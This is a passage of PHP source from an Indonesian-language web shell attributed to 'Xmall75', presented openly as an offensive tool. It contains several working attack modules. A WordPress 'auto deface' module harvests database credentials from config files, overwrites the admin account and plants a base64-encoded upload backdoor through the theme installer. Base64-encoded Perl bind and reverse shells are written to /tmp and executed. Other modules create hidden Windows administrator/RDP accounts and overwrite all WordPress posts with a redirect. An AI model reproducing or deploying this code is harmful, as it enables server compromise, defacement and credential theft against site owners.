2080 $sha1complete = sha1($sha256.$sha384.$sha512.$pass); // sha1 - sha256 - sha384 - sha512
2081 $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt
2082 $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5
2083 $crypt = crypt($pass); // crypt hash
2084
2085
2086 }
2087 echo '<form action="" method="post"><b> ';
2088
2089 echo "<font color='lime'> Kata : ";
2090 echo "<br>";
2091 echo '<input type="text" name="password" size="50" />';
2092 echo '<input type="submit" name="go" value=">>" />';
2093 echo '<br>';
2094 echo '<br>';
2095 echo "<span style='color: lime; font-size: 16px;'>Password lu : </span><span style='color: red; size: 14px;'>".$pass."</span>";
2096 echo '<br>';
2097 echo '<br>';
2098 echo '<h2>Hasil Hash</h2></th></center></tr>';
2099 echo '<br>';
2100 echo ' Crypt - MD5(Unix) <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value='.$crypt.'><br><br>';
2101 echo ' MD5 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash . '> <br><br>';
2102 echo ' MD2 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $md2 . '> <br><br>';
2103 echo ' MD4 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $md4 . '> <br><br>';
2104 echo ' MD5 with MD4 - MD2 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value='.$md5_md4_md2.'><br><br>';
2105 echo ' MD5 with Salt <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash_md5 . '> <br><br>';
2106 echo ' MD5 with Salt & Sha1 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash_md5_double . '> <br><br>';
2107 echo ' Sha1 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash1 . '> <br><br>';
2108 echo ' Sha256 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $sha256 . '> <br><br>';
2109 echo ' Sha384 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $sha384 . '> <br><br>';
2110 echo ' Sha512 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $sha512 . '> <br><br>';
2111 echo ' Sha1 with Sha256 - Sha384 - Sha512 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $sha1complete . '> <br><br>';
2112 echo ' Sha1 with Salt <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash1_sha1 . '> <br><br>';
2113 echo ' Sha1 with Salt & MD5 <br> <input style="cursor: text;" type=text size=50 readonly="readonly" value=' . $hash1_sha1_double . '> </font><br><br>';
2114
2115} elseif($_GET['do'] == 'adminer') {
2116 $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2117 function adminer($url, $isi) {
2118 $fp = fopen($isi, "w");
2119 $ch = curl_init();
2120 curl_setopt($ch, CURLOPT_URL, $url);
2121 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2122 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2123 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2124 curl_setopt($ch, CURLOPT_FILE, $fp);
2125 return curl_exec($ch);
2126 curl_close($ch);
2127 fclose($fp);
2128 ob_flush();
2129 flush();
2130 }
2131 if(file_exists('adminer.php')) {
2132 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2133 } else {
2134 if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
2135 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
2136 } else {
2137 echo "<center><font color=red>gagal buat file adminer</font></center>";
2138 }
2139 }
2140} elseif($_GET['do'] == 'auto_dwp') {
2141 if($_POST['auto_deface_wp']) {
2142 function anucurl($sites) {
2143 $ch = curl_init($sites);
2144 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2145 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2146 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2147 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2148 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2149 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2150 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2151 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2152 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2153 $data = curl_exec($ch);
2154 curl_close($ch);
2155 return $data;
2156 }
2157 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2158 $post = array(
2159 "log" => "$userr",
2160 "pwd" => "$pass",
2161 "rememberme" => "forever",
2162 "wp-submit" => "$wp_submit",
2163 "redirect_to" => "$web",
2164 "testcookie" => "1",
2165 );
2166 $ch = curl_init($cek);
2167 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2168 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2169 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2170 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2171 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2172 curl_setopt($ch, CURLOPT_POST, 1);
2173 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2174 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2175 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2176 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2177 $data = curl_exec($ch);
2178 curl_close($ch);
2179 return $data;
2180 }
2181 $scan = $_POST['link_config'];
2182 $link_config = scandir($scan);
2183 $script = htmlspecialchars($_POST['script']);
2184 $user = "Xmall75";
2185 $pass = "Xmall75";
2186 $passx = md5($pass);
2187 foreach($link_config as $dir_config) {
2188 if(!is_file("$scan/$dir_config")) continue;
2189 $config = file_get_contents("$scan/$dir_config");
2190 if(preg_match("/WordPress/", $config)) {
2191 $dbhost = ambilkata($config,"DB_HOST', '","'");
2192 $dbuser = ambilkata($config,"DB_USER', '","'");
2193 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2194 $dbname = ambilkata($config,"DB_NAME', '","'");
2195 $dbprefix = ambilkata($config,"table_prefix = '","'");
2196 $prefix = $dbprefix."users";
2197 $option = $dbprefix."options";
2198 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2199 $db = mysql_select_db($dbname);
2200 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2201 $result = mysql_fetch_array($q);
2202 $id = $result[ID];
2203 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2204 $result2 = mysql_fetch_array($q2);
2205 $target = $result2[option_value];
2206 if($target == '') {
2207 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2208 } else {
2209 echo "[+] $target <br>";
2210 }
2211 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2212 if(!$conn OR !$db OR !$update) {
2213 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2214 mysql_close($conn);
2215 } else {
2216 $site = "$target/wp-login.php";
2217 $site2 = "$target/wp-admin/theme-install.php?upload";
2218 $b1 = anucurl($site2);
2219 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2220 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2221 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2222 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2223 $www = "m.php";
2224 $fp5 = fopen($www,"w");
2225 fputs($fp5,$upload3);
2226 $post2 = array(
2227 "_wpnonce" => "$anu2",
2228 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2229 "themezip" => "@$www",
2230 "install-theme-submit" => "Install Now",
2231 );
2232 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2233 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2234 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2235 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2236 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2237 curl_setopt($ch, CURLOPT_POST, 1);
2238 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2239 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2240 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2241 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2242 $data3 = curl_exec($ch);
2243 curl_close($ch);
2244 $y = date("Y");
2245 $m = date("m");
2246 $namafile = "id.php";
2247 $fpi = fopen($namafile,"w");
2248 fputs($fpi,$script);
2249 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2250 curl_setopt($ch6, CURLOPT_POST, true);
2251 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2252 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2253 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2254 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2255 curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
2256 $postResult = curl_exec($ch6);
2257 curl_close($ch6);
2258 $as = "$target/k.php";
2259 $bs = anucurl($as);
2260 if(preg_match("#$script#is", $bs)) {
2261 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2262 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2263 } else {
2264 echo "[-] <font color='red'>gagal mepes...</font><br>";
2265 echo "[!!] coba aja manual: <br>";
2266 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2267 echo "[+] username: <font color=lime>$user</font><br>";
2268 echo "[+] password: <font color=lime>$pass</font><br><br>";
2269 }
2270 mysql_close($conn);
2271 }
2272 }
2273 }
2274 } else {
2275 echo "<center><h1>WordPress Auto Deface</h1>
2276 <form method='post'>
2277 <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
2278 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Xmall75 - Security Cyber Art' required><br>
2279 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2280 </form>
2281 <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
2282 </center>";
2283 }
2284} elseif($_GET['do'] == 'auto_dwp2') {
2285 if($_POST['auto_deface_wp']) {
2286 function anucurl($sites) {
2287 $ch = curl_init($sites);
2288 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2289 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2290 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2291 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2292 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2293 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2294 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2295 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2296 curl_setopt($ch, CURLOPT_COOKIESESSION,true);
2297 $data = curl_exec($ch);
2298 curl_close($ch);
2299 return $data;
2300 }
2301 function lohgin($cek, $web, $userr, $pass, $wp_submit) {
2302 $post = array(
2303 "log" => "$userr",
2304 "pwd" => "$pass",
2305 "rememberme" => "forever",
2306 "wp-submit" => "$wp_submit",
2307 "redirect_to" => "$web",
2308 "testcookie" => "1",
2309 );
2310 $ch = curl_init($cek);
2311 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2312 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2313 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
2314 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2315 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2316 curl_setopt($ch, CURLOPT_POST, 1);
2317 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
2318 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2319 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2320 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2321 $data = curl_exec($ch);
2322 curl_close($ch);
2323 return $data;
2324 }
2325 $link = explode("\r\n", $_POST['link']);
2326 $script = htmlspecialchars($_POST['script']);
2327 $user = "Xmall75";
2328 $pass = "Xmall75";
2329 $passx = md5($pass);
2330 foreach($link as $dir_config) {
2331 $config = anucurl($dir_config);
2332 $dbhost = ambilkata($config,"DB_HOST', '","'");
2333 $dbuser = ambilkata($config,"DB_USER', '","'");
2334 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2335 $dbname = ambilkata($config,"DB_NAME', '","'");
2336 $dbprefix = ambilkata($config,"table_prefix = '","'");
2337 $prefix = $dbprefix."users";
2338 $option = $dbprefix."options";
2339 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2340 $db = mysql_select_db($dbname);
2341 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2342 $result = mysql_fetch_array($q);
2343 $id = $result[ID];
2344 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2345 $result2 = mysql_fetch_array($q2);
2346 $target = $result2[option_value];
2347 if($target == '') {
2348 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
2349 } else {
2350 echo "[+] $target <br>";
2351 }
2352 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
2353 if(!$conn OR !$db OR !$update) {
2354 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
2355 mysql_close($conn);
2356 } else {
2357 $site = "$target/wp-login.php";
2358 $site2 = "$target/wp-admin/theme-install.php?upload";
2359 $b1 = anucurl($site2);
2360 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
2361 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
2362 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
2363 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
2364 $www = "m.php";
2365 $fp5 = fopen($www,"w");
2366 fputs($fp5,$upload3);
2367 $post2 = array(
2368 "_wpnonce" => "$anu2",
2369 "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
2370 "themezip" => "@$www",
2371 "install-theme-submit" => "Install Now",
2372 );
2373 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
2374 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2375 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2376 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
2377 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
2378 curl_setopt($ch, CURLOPT_POST, 1);
2379 curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
2380 curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
2381 curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
2382 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2383 $data3 = curl_exec($ch);
2384 curl_close($ch);
2385 $y = date("Y");
2386 $m = date("m");
2387 $namafile = "id.php";
2388 $fpi = fopen($namafile,"w");
2389 fputs($fpi,$script);
2390 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
2391 curl_setopt($ch6, CURLOPT_POST, true);
2392 curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
2393 curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
2394 curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
2395 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
2396 curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
2397 $postResult = curl_exec($ch6);
2398 curl_close($ch6);
2399 $as = "$target/k.php";
2400 $bs = anucurl($as);
2401 if(preg_match("#$script#is", $bs)) {
2402 echo "[+] <font color='lime'>berhasil mepes...</font><br>";
2403 echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
2404 } else {
2405 echo "[-] <font color='red'>gagal mepes...</font><br>";
2406 echo "[!!] coba aja manual: <br>";
2407 echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
2408 echo "[+] username: <font color=lime>$user</font><br>";
2409 echo "[+] password: <font color=lime>$pass</font><br><br>";
2410 }
2411 mysql_close($conn);
2412 }
2413 }
2414 } else {
2415 echo "<center><h1>WordPress Auto Deface V.2</h1>
2416 <form method='post'>
2417 Link Config: <br>
2418 <textarea name='link' placeholder='http://target.com/pastigans_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
2419 <input type='text' name='script' height='10' size='50' placeholder='Hacked by Xmall75 - Security Cyber Art' required><br>
2420 <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
2421 </form></center>";
2422 }
2423} elseif($_GET['do'] == 'network') {
2424 echo "<form method='post'>
2425 <u>Bind Port:</u> <br>
2426 PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2427 <input type='submit' name='sub_bp' value='>>'>
2428 </form>
2429 <form method='post'>
2430 <u>Back Connect:</u> <br>
2431 Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
2432 PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2433 <input type='submit' name='sub_bc' value='>>'>
2434 </form>";
2435 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2436 if(isset($_POST['sub_bp'])) {
2437 $f_bp = fopen("/tmp/bp.pl", "w");
2438 fwrite($f_bp, base64_decode($bind_port_p));
2439 fclose($f_bp);
2440
2441 $port = $_POST['port_bind'];
2442 $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2443 sleep(1);
2444 echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2445 unlink("/tmp/bp.pl");
2446 }
2447 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2448 if(isset($_POST['sub_bc'])) {
2449 $f_bc = fopen("/tmp/bc.pl", "w");
2450 fwrite($f_bc, base64_decode($bind_connect_p));
2451 fclose($f_bc);
2452
2453 $ipbc = $_POST['ip_bc'];
2454 $port = $_POST['port_bc'];
2455 $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2456 sleep(1);
2457 echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2458 unlink("/tmp/bc.pl");
2459 }
2460} elseif($_GET['do'] == 'krdp_shell') {
2461 if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2462 if($_POST['create']) {
2463 $user = htmlspecialchars($_POST['user']);
2464 $pass = htmlspecialchars($_POST['pass']);
2465 if(preg_match("/$user/", exe("net user"))) {
2466 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
2467 } else {
2468 $add_user = exe("net user $user $pass /add");
2469 $add_groups1 = exe("net localgroup Administrators $user /add");
2470 $add_groups2 = exe("net localgroup Administrator $user /add");
2471 $add_groups3 = exe("net localgroup Administrateur $user /add");
2472 echo "[ RDP ACCOUNT INFO ]<br>
2473 ------------------------------<br>
2474 IP: <font color=lime>".$ip."</font><br>
2475 Username: <font color=lime>$user</font><br>
2476 Password: <font color=lime>$pass</font><br>
2477 ------------------------------<br><br>
2478 [ STATUS ]<br>
2479 ------------------------------<br>
2480 ";
2481 if($add_user) {
2482 echo "[add user] -> <font color='lime'>Berhasil</font><br>";
2483 } else {
2484 echo "[add user] -> <font color='red'>Gagal</font><br>";
2485 }
2486 if($add_groups1) {
2487 echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
2488 } elseif($add_groups2) {
2489 echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
2490 } elseif($add_groups3) {
2491 echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
2492 } else {
2493 echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2494 }
2495 echo "------------------------------<br>";
2496 }
2497 } elseif($_POST['s_opsi']) {
2498 $user = htmlspecialchars($_POST['r_user']);
2499 if($_POST['opsi'] == '1') {
2500 $cek = exe("net user $user");
2501 echo "Checking username <font color=lime>$user</font> ....... ";
2502 if(preg_match("/$user/", $cek)) {
2503 echo "[ <font color=lime>Sudah ada</font> ]<br>
2504 ------------------------------<br><br>
2505 <pre>$cek</pre>";
2506 } else {
2507 echo "[ <font color=red>belum ada</font> ]";
2508 }
2509 } elseif($_POST['opsi'] == '2') {
2510 $cek = exe("net user $user xmall75");
2511 if(preg_match("/$user/", exe("net user"))) {
2512 echo "[change password: <font color=lime>xmall75</font>] -> ";
2513 if($cek) {
2514 echo "<font color=lime>Berhasil</font>";
2515 } else {
2516 echo "<font color=red>Gagal</font>";
2517 }
2518 } else {
2519 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2520 }
2521 } elseif($_POST['opsi'] == '3') {
2522 $cek = exe("net user $user /DELETE");
2523 if(preg_match("/$user/", exe("net user"))) {
2524 echo "[remove user: <font color=lime>$user</font>] -> ";
2525 if($cek) {
2526 echo "<font color=lime>Berhasil</font>";
2527 } else {
2528 echo "<font color=red>Gagal</font>";
2529 }
2530 } else {
2531 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2532 }
2533 } else {
2534 //
2535 }
2536 } else {
2537 echo "-- Create RDP --<br>
2538 <form method='post'>
2539 <input type='text' name='user' placeholder='username' value='Xmall75' required>
2540 <input type='text' name='pass' placeholder='password' value='Xmall75' required>
2541 <input type='submit' name='create' value='>>'>
2542 </form>
2543 -- Option --<br>
2544 <form method='post'>
2545 <input type='text' name='r_user' placeholder='username' required>
2546 <select name='opsi'>
2547 <option value='1'>Cek Username</option>
2548 <option value='2'>Ubah Password</option>
2549 <option value='3'>Hapus Username</option>
2550 </select>
2551 <input type='submit' name='s_opsi' value='>>'>
2552 </form>
2553 ";
2554 }
2555 } else {
2556 echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2557 }
2558
2559} elseif($_GET['do'] == 'wp_hijack') {
2560
2561 @ini_set('output_buffering',0);
2562
2563 echo '<form method="POST">
2564<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#1975FF">Wordpress Index Hijack Priv8</span></center><br>
2565<br><center><font color="#1975FF" size="2" face="orion">Coded By Mauritania Attacker</font></center><br>
2566<center><input type="text" value="localhost" name="pghost">
2567<input type="text" value="database_name" name="dbnmn">
2568<input type="text" value="prefix" name="prefix">
2569<input type="text" value="username_db" name="dbusrrrr">
2570<input type="text" value="password_db" name="pwddbbn"></center><br>
2571<center><textarea name="pown" cols="100" rows="7"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw/PTShfKL9"></textarea><br><br>
2572<input type="submit" name="up2" value="Hijack Index"><br></center><form>';
2573
2574$pghost = $_POST['pghost'];
2575$dbnmn = $_POST['dbnmn'];
2576$dbusrrrr = $_POST['dbusrrrr'];
2577$pwddbbn = $_POST['pwddbbn'];
2578$index = stripslashes($_POST['pown']);
2579$prefix = $_POST['prefix'];
2580//$prefix = "wp_";
2581if ($_POST['up2']) {
2582@mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());
2583@mysql_select_db($dbnmn) or die(mysql_error());
2584$tableName = $prefix . "posts";
2585$ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");
2586if (!$ghost1) {
2587$ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");
2588} elseif (!$ghost2) {
2589$ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");
2590}
2591mysql_close();
2592if ($ghost1 || $ghost2 || $ghost3) {
2593echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>";
2594} else {
2595echo "<center><p><b><font color='red'>Failed To Hijack the Website :(</font></p></b></center>";
2596}
2597}
2598
2599} elseif($_GET['do'] == 'cms_detect') {
2600
2601 echo "<center><b><h2>[ CMS Detector ]</h2></b></center>";
2602
2603
2604 if(!file_exists('ganteng.tmp')){
2605@fopen('ganteng.tmp', 'w');
2606
2607echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2608echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>';
2609
2610$p = 0;
2611
2612if(is_readable("/var/named")){
2613$list = scandir("/var/named");
2614$current_dir = posix_getcwd();
2615$dir = explode("/",$current_dir);
2616foreach($list as $domain){
2617if(strpos($domain,".db"))
2618{
2619 $domain = str_replace('.db','',$domain);
2620 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2621
2622error_reporting(0);
2623
2624$link = $pageURL.'ganteng/'.$owner['name'];
2625
2626cms_add($link,$domain,$owner['name'],"WordPress");
2627cms_add($link,$domain,$owner['name'],"Joomla");
2628cms_add($link,$domain,$owner['name'],"vBulletin");
2629cms_add($link,$domain,$owner['name'],"WHMCS");
2630cms_add($link,$domain,$owner['name'],"PhpBB");
2631cms_add($link,$domain,$owner['name'],"MyBB");
2632cms_add($link,$domain,$owner['name'],"IPB");
2633cms_add($link,$domain,$owner['name'],"SMF");
2634cms_add($link,$domain,$owner['name'],"Drupal");
2635cms_add($link,$domain,$owner['name'],"e107");
2636cms_add($link,$domain,$owner['name'],"Seditio");
